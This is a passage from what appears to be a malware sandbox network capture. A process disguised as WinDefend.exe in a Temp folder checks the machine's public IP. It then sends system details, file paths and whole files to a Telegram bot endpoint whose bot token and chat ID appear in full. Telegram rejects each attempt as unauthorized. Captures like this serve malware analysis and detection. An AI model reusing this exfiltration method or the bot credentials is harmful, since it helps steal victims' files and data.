50 61 63 6b 61 67 65 73 25 35 43 4d 69 63 72 6f 73 6f 66 74 2e 4d 69 63 72 6f 73 Data Ascii: chat_id=1655240967&text=File%3A+tinytile.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CPackages%5CMicrosoft.Micros
2024-05-23 13:34:15 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:15 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	61040	64.185.227.155	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:16 UTC	65	OUT	GET / HTTP/1.1 Host: api64.ipify.org Connection: Keep-Alive
2024-05-23 13:34:16 UTC	157	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Thu, 23 May 2024 13:34:16 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin
2024-05-23 13:34:16 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35 Data Ascii: 8.46.123.175

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	61042	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:16 UTC	235	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="e1a547f3-58c8-4c01-9faa-06be2ad112c9" Host: api.telegram.org Content-Length: 468550 Expect: 100-continue
2024-05-23 13:34:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:16 UTC	40	OUT	Data Raw: 2d 2d 65 31 61 35 34 37 66 33 2d 35 38 63 38 2d 34 63 30 31 2d 39 66 61 61 2d 30 36 62 65 32 61 64 31 31 32 63 39 0d 0a Data Ascii: --e1a547f3-58c8-4c01-9faa-06be2ad112c9
2024-05-23 13:34:16 UTC	119	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=PDFSigQFormalRep.pdf; filename*=utf-8''PDFSigQFormalRep.pdf
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 25 50 44 46 2d 31 2e 36 0d 25 e2 e3 cf d3 0d 0a 37 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 32 31 31 2f 4f 20 39 2f 45 20 31 37 36 37 2f 4e 20 31 2f 54 20 35 39 32 32 2f 48 20 5b 20 34 34 37 20 31 33 32 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 32 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 34 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 33 45 35 36 44 39 43 30 42 30 45 33 44 31 34 44 38 43 36 39 41 44 46 35 41 37 30 30 42 32 46 44 3e 3c 42 33 44 31 32 31 33 38 46 43 42 34 45 35 34 45 41 39 43 43 45 39 43 39 30 34 30 41 35 41 37 Data Ascii: %PDF-1.6%7 0 obj<</Linearized 1/L 6211/O 9/E 1767/N 1/T 5922/H [ 447 132]>>endobj 12 0 obj<</DecodeParms<</Columns 4/Predictor 12>>/Filter/FlateDecode/ID[<3E56D9C0B0E3D14D8C69ADF5A700B2FD><B3D12138FCB4E54EA9CCE9C9040A5A7
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii:
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 35 5b 35 35 36 20 37 37 38 20 35 35 36 20 32 37 38 20 36 36 37 20 35 30 30 20 37 32 32 20 35 30 30 20 37 32 32 20 35 30 30 20 35 35 36 20 35 35 32 20 33 33 33 20 36 36 37 20 35 35 36 20 36 36 37 20 35 35 36 20 37 32 32 20 36 31 35 20 37 32 32 20 36 36 37 20 35 35 36 20 36 36 37 5d 32 36 38 20 32 36 39 20 35 35 36 20 32 37 30 5b 32 32 32 20 35 35 36 20 32 39 32 20 35 35 36 20 33 33 34 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 37 38 20 35 35 36 20 37 32 32 20 33 33 33 20 37 32 32 20 33 33 33 20 36 36 37 20 35 30 30 20 36 31 31 20 32 37 38 20 36 31 31 20 33 37 35 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 36 31 31 20 35 30 30 20 36 31 31 20 35 30 30 20 35 35 31 20 37 37 38 20 37 39 38 20 35 37 38 20 35 35 37 20 34 34 36 20 36 31 37 20 33 Data Ascii: 5[556 778 556 278 667 500 722 500 722 500 556 552 333 667 556 667 556 722 615 722 667 556 667]268 269 556 270[222 556 292 556 334 722 556 722 556 778 556 722 333 722 333 667 500 611 278 611 375 722 556 722 556 611 500 611 500 551 778 798 578 557 446 617 3
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 32 36 5d 31 33 38 38 20 31 33 38 39 20 35 33 30 20 31 33 39 30 5b 35 36 33 20 35 32 36 5d 31 33 39 32 20 31 33 39 33 20 35 33 30 20 31 33 39 34 5b 35 36 33 20 35 32 36 5d 31 33 39 36 20 31 33 39 37 20 35 33 30 20 31 33 39 38 5b 35 36 33 20 35 32 36 5d 31 34 30 30 20 31 34 30 31 20 35 33 30 20 31 34 30 32 5b 35 36 33 20 35 32 36 5d 31 34 30 34 20 31 34 30 35 20 35 33 30 20 31 34 30 36 20 31 34 32 33 20 33 33 37 20 31 34 32 34 20 31 34 33 39 20 34 38 39 20 31 34 34 30 20 31 34 34 31 20 38 32 31 20 31 34 34 32 20 31 34 34 33 20 35 33 31 20 31 34 34 34 20 31 34 34 35 20 38 32 31 20 31 34 34 36 20 31 34 34 37 20 35 33 31 20 31 34 34 38 20 31 34 34 39 20 38 32 31 20 31 34 35 30 20 31 34 35 31 20 35 33 31 20 31 34 35 32 20 31 34 35 33 20 31 30 39 38 20 31 34 35 Data Ascii: 26]1388 1389 530 1390[563 526]1392 1393 530 1394[563 526]1396 1397 530 1398[563 526]1400 1401 530 1402[563 526]1404 1405 530 1406 1423 337 1424 1439 489 1440 1441 821 1442 1443 531 1444 1445 821 1446 1447 531 1448 1449 821 1450 1451 531 1452 1453 1098 145
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 20 35 35 36 20 36 36 37 20 35 35 36 20 36 31 31 20 32 37 38 20 37 37 38 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 32 37 38 20 32 32 32 5d 32 34 37 37 20 32 34 37 38 20 32 37 38 20 32 34 37 39 5b 36 36 37 20 35 30 30 20 36 36 37 20 35 30 30 20 36 36 37 20 35 30 30 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 20 35 35 36 20 32 32 32 5d 32 34 39 33 20 32 34 39 38 20 38 33 33 20 32 34 39 39 5b 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 32 32 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 37 37 38 20 35 35 36 20 36 36 37 20 35 35 36 20 36 36 37 20 35 35 36 20 37 32 32 20 Data Ascii: 556 667 556 611 278 778 556 722 556 722 556 722 556 722 556 722 556 278 222]2477 2478 278 2479[667 500 667 500 667 500 556 222 556 222 556 222 556 222]2493 2498 833 2499[722 556 722 556 722 556 722 556 778 556 778 556 778 556 778 556 667 556 667 556 722
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: 39 37 20 31 30 33 37 20 38 34 31 20 32 37 38 20 34 33 38 5d 33 34 30 37 20 33 34 30 38 20 31 39 31 20 33 34 30 39 20 33 34 31 30 20 35 30 30 20 33 34 31 31 20 33 34 31 33 20 32 37 38 20 33 34 31 34 5b 33 33 33 5d 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 37 20 30 20 6f 62 6a 0d 3c 3c 2f 4f 72 64 65 72 69 6e 67 28 49 64 65 6e 74 69 74 79 29 2f 52 65 67 69 73 74 72 79 28 41 64 6f 62 65 29 2f 53 75 70 70 6c 65 6d 65 6e 74 20 30 3e 3e 0d 65 6e 64 6f 62 6a 0d 32 38 20 30 20 6f 62 6a 0d 3c 3c 2f 41 73 63 65 6e 74 20 31 30 30 36 2f 43 49 44 53 65 74 20 32 39 20 30 20 52 2f 43 61 70 48 65 69 67 68 74 20 37 31 36 2f 44 65 73 63 65 6e 74 20 2d 33 32 35 2f 46 6c 61 67 73 20 34 2f 46 6f 6e 74 42 42 6f 78 5b 2d 36 36 35 20 2d 33 32 35 20 32 30 30 30 20 31 30 30 36 5d 2f 46 Data Ascii: 97 1037 841 278 438]3407 3408 191 3409 3410 500 3411 3413 278 3414[333...>endobj27 0 obj<</Ordering(Identity)/Registry(Adobe)/Supplement 0>>endobj28 0 obj<</Ascent 1006/CIDSet 29 0 R/CapHeight 716/Descent -325/Flags 4/FontBBox[-665 -325 2000 1006]/F
2024-05-23 13:34:16 UTC	4096	OUT	Data Raw: eb e7 ec 01 6a 90 37 df 7f 44 c5 aa 81 4b 86 d8 1f 20 d3 1d 4e 4c 14 db ee e2 49 f0 36 c3 3a 1e 25 3f 44 1a a2 b8 4e 57 d4 a1 7a b2 85 3c 49 5e 80 55 7a 84 dc 87 ca f0 2b fd 39 b0 4f 01 d8 c3 31 3a 05 68 8f 4d c7 ea 33 d3 c9 2b aa 8b 45 16 8a 6e c7 e2 b0 e3 07 74 3c b7 f2 a1 d9 0c a8 43 49 9c 7c 2a 91 a8 28 0c 56 2e 87 88 d7 d6 d6 54 03 f4 cd 45 11 f2 02 96 47 51 82 97 97 ee 2d 27 c5 15 bf 79 ed 8b df 1d 7e ee 47 af e3 61 f7 9d 8f 26 6f 3f f8 db 53 bf de 1c 38 76 6c 55 6c fb d8 f3 e3 57 77 b4 1f 78 3d e5 3e ff f1 e7 c7 e2 6f 9f 7c b3 67 eb 52 48 44 2f 20 85 0a 23 90 05 76 5c a9 d7 ba e2 ca 4e e5 35 e5 a8 72 56 11 d6 71 eb ec bf e0 39 17 78 02 29 22 27 09 36 99 93 90 02 90 38 c7 f1 05 1c c7 73 76 44 14 3b 2f 71 a3 64 14 59 60 cb e8 d3 6d 88 e7 a1 09 3a 67 Data Ascii: j7DK NLI6:%?DNWz<I^Uz+9O1:hM3+Ent<CI\|*(V.TEGQ-'y~Ga&o?S8vlUlWwx=>o\|gRHD/ #v\N5rVq9x)"'68svD;/qdY`m:g
2024-05-23 13:34:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	61043	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:16 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="c9ea3915-752d-415a-b207-143db89b04e6" Host: api.telegram.org Content-Length: 1955 Expect: 100-continue
2024-05-23 13:34:16 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:17 UTC	40	OUT	Data Raw: 2d 2d 63 39 65 61 33 39 31 35 2d 37 35 32 64 2d 34 31 35 61 2d 62 32 30 37 2d 31 34 33 64 62 38 39 62 30 34 65 36 0d 0a Data Ascii: --c9ea3915-752d-415a-b207-143db89b04e6
2024-05-23 13:34:17 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 74 69 6e 79 74 69 6c 65 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 74 69 6e 79 74 69 6c 65 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=tinytile.png; filename*=utf-8''tinytile.png
2024-05-23 13:34:17 UTC	1627	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 47 00 00 00 47 08 06 00 00 00 55 b0 5a 1f 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 05 fd 49 44 41 54 78 da ec 9a 4b 8c 14 45 18 c7 ff d5 8f 9d e7 32 b3 30 bb 3c 64 16 61 49 58 82 ee 82 81 64 11 48 4c 8c 86 98 e8 85 80 21 4b 3c 79 f1 e2 19 6f c6 93 89 cf 83 17 0f 9e 30 86 78 34 31 9a d5 93 51 88 17 31 a0 84 c4 84 b7 22 28 2e cb ee ce f4 f4 a3 ca af aa bb f7 01 bd 9b c5 ed 1e 76 b0 2a 5b 53 dd d5 3d bd 53 bf fe ea ff 7d 5f 75 33 21 04 74 49 2e 86 46 a0 e1 68 38 1a 8e 86 a3 e1 68 38 1a 8e 86 a3 e1 e8 a2 e1 68 38 1a 8e 86 a3 e1 68 38 1a 8e 86 f3 3f 28 56 1a 17 61 8c 2d f5 d4 2e bc f2 d9 00 2a 1b fa 53 f9 f5 77 ae 5f c5 89 63 17 Data Ascii: PNGIHDRGGUZtEXtSoftwareAdobe ImageReadyqe<IDATxKE20<daIXdHL!K<yo0x41Q1"(.v[S=S}_u3!tI.Fh8h8h8h8?(Va-.Sw_c
2024-05-23 13:34:17 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 63 39 65 61 33 39 31 35 2d 37 35 32 64 2d 34 31 35 61 2d 62 32 30 37 2d 31 34 33 64 62 38 39 62 30 34 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --c9ea3915-752d-415a-b207-143db89b04e6Content-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:34:17 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:34:17 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 63 39 65 61 33 39 31 35 2d 37 35 32 64 2d 34 31 35 61 2d 62 32 30 37 2d 31 34 33 64 62 38 39 62 30 34 65 36 2d 2d 0d 0a Data Ascii: --c9ea3915-752d-415a-b207-143db89b04e6--
2024-05-23 13:34:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	61044	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:16 UTC	220	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 493 Expect: 100-continue Connection: Keep-Alive
2024-05-23 13:34:17 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:17 UTC	493	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 25 30 44 25 30 41 25 46 30 25 39 46 25 39 36 25 41 35 25 32 30 25 32 41 25 32 41 53 79 73 74 65 6d 25 32 30 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 25 32 41 25 32 41 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4f 53 25 35 44 25 33 41 25 32 30 25 32 30 25 32 30 4d 69 63 72 6f 73 6f 66 74 25 32 30 57 69 6e 64 6f 77 73 25 32 30 4e 54 25 32 30 36 2e 32 2e 39 32 30 30 2e 30 25 30 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 35 42 25 46 30 25 39 46 25 39 31 25 41 38 25 45 32 25 38 30 25 38 44 25 46 30 25 39 46 25 39 32 25 42 42 25 32 30 4d 61 63 68 69 6e 65 25 32 30 4e 61 6d 65 25 35 Data Ascii: chat_id=1655240967&text=%0D%0A%F0%9F%96%A5%20%2A%2ASystem%20Information%3A%2A%2A%0D%0A%20%20%20%20%20%20%5B%F0%9F%92%BB%20OS%5D%3A%20%20%20Microsoft%20Windows%20NT%206.2.9200.0%0D%0A%20%20%20%20%20%20%5B%F0%9F%91%A8%E2%80%8D%F0%9F%92%BB%20Machine%20Name%5
2024-05-23 13:34:17 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:17 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	61048	149.154.167.220	443	4768	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:17 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 351 Expect: 100-continue
2024-05-23 13:34:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:18 UTC	351	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 73 71 75 61 72 65 74 69 6c 65 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 50 61 63 6b 61 67 65 73 25 35 43 4d 69 63 72 6f 73 6f 66 74 2e 4d 69 63 72 Data Ascii: chat_id=1655240967&text=File%3A+squaretile.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CPackages%5CMicrosoft.Micr
2024-05-23 13:34:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	61049	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:18 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 181 Expect: 100-continue
2024-05-23 13:34:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:18 UTC	181	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 61 64 63 5f 6c 6f 67 6f 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 61 64 63 5f 6c 6f 67 6f 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 33 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+adc_logo.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cadc_logo.png%0ASize%3A+3+KB
2024-05-23 13:34:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	61051	149.154.167.220	443	2132	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:18 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 154 Expect: 100-continue
2024-05-23 13:34:18 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:18 UTC	154	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 50 44 46 53 69 67 51 46 6f 72 6d 61 6c 52 65 70 2e 70 64 66 25 30 41 53 69 7a 65 25 33 41 2b 34 35 37 2b 4b 42 Data Ascii: chat_id=1655240967&text=File%3A+PDFSigQFormalRep.pdf%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CPDFSigQFormalRep.pdf%0ASize%3A+457+KB
2024-05-23 13:34:18 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:34:18 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	61053	149.154.167.220	443	7572	C:\Users\user\AppData\Local\Temp\WinDefend.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:34:19 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="617fa9fc-b519-4623-a5ab-ad420e993788" Host: api.telegram.org Content-Length: 4037 Expect: 100-continue
2024-05-23 13:34:19 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:34:19 UTC	40	OUT	Data Raw: 2d 2d 36 31 37 66 61 39 66 63 2d 62 35 31 39 2d 34 36 32 33 2d 61 35 61 62 2d 61 64 34 32 30 65 39 39 33 37 38 38 0d 0a Data Ascii: --617fa9fc-b519-4623-a5ab-ad420e993788
2024-05-23 13:34:19 UTC	103	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 61 64 63 5f 6c 6f 67 6f 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 61 64 63 5f 6c 6f 67 6f 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=adc_logo.png; filename*=utf-8''adc_logo.png
